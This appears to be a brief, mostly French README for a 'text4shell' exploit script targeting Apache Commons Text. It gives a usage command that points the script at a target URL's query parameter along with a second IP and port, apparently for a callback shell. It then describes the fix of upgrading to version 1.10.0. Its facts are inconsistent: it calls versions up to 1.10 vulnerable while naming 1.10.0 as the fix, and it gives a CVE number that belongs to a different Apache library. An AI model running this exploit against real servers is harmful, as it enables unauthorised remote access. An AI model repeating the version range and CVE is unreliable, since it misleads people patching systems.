
text4shell script pour text coomons < =1.10 CVE-2022-33980
script text4shell pour Apache Commons Text <= 1.10 CVE-2022-33980
python3 text4shell.py -u http://192.168.245.111:8080/search?query= -i 192.168.111.186 -p 22
La solution principale consiste à mettre à jour d'urgence le composant Apache Commons Text vers les versions disponibles qui corrigent cette vulnérabilité. Concrètement, mettez à jour vers une version 1.10.0 ou ultérieure d'Apache Commons Text.
Dans cette mise à jour, les substitutions problématiques ont été désactivées par défaut. Le fichier changelog de la librairie inclut la modification suivante :
Rendre les recherches de chaînes par défaut configurables via une propriété système. Supprimer les recherches dns, url et script des valeurs par défaut. Si ces recherches sont nécessaires pour une utilisation dans StringSubstitutor.createInterpolator(), elles doivent être activées via une propriété système. Voir StringLookupFactory pour les détails.
Apache a publié un communiqué contenant les informations officielles et une référence à la mise à jour qui corrige le problème.